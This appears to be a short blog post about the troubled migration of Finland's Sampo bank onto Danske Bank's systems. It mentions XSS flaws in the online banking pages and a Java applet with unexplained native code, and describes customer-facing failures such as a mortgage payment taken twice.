Finnish Sampo bank switched over to Danske Bank's information systems. This merge took over 14 months with over 3100 persons. And results was rather embarrassing.

Their online customer pages have numerous XSS vulnerabilities. In practice this means that malicious content can be injected on the web page while user sees the original domain on the URL field. There are many example floating around internet. Here is a screenshot.

The online banking is implemented with Java applet and some native code. The purpose of this native code is unknown but curious minds have already analyzed applet. Here is one wikipage.

Because there are also other problems with their banking systems the online banking has been working badly and customers have experienced bizarre issues. Balance is not matching reality, some functionality is not available and also normal ATM withdraw transactions have failed with some Sampo customer. The latest and also pretty severe problem happened to a poor customer whose mortgage payment was taken twice.

No wonder Sampo-Danske bank customers are angry and changing bank. As soon as their system is back online.